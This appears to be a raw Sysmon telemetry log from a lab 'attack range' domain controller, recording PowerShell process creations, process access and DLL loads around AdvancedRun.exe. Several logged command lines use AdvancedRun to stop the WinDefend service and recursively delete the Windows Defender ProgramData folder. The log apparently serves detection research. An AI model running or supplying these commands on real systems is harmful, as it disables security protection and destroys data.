154100x80000000000000003917193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:59:21.882{834264DD-E669-61EA-4802-000000002702}5080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003916444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:56.348{834264DD-E650-61EA-3F02-000000002702}6008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003916031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:50.177{834264DD-E64A-61EA-3B02-000000002702}740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003915622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:27.655{834264DD-E633-61EA-3802-000000002702}2152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 
CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003915098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:09.418{834264DD-E621-61EA-3502-000000002702}172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 10341000x80000000000000003912182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285520C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.412{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.396{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.396{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.396{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003912168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.380{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003912167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
16:53:55.287{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.287{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.240{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® 
C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003912162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003912161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003912160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003912159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:53:55.224{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003912158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003911022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.829{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.798{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.782{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003910937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.766{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003910890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:52:29.751{834264DD-E4CD-61EA-0302-000000002702}1972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base 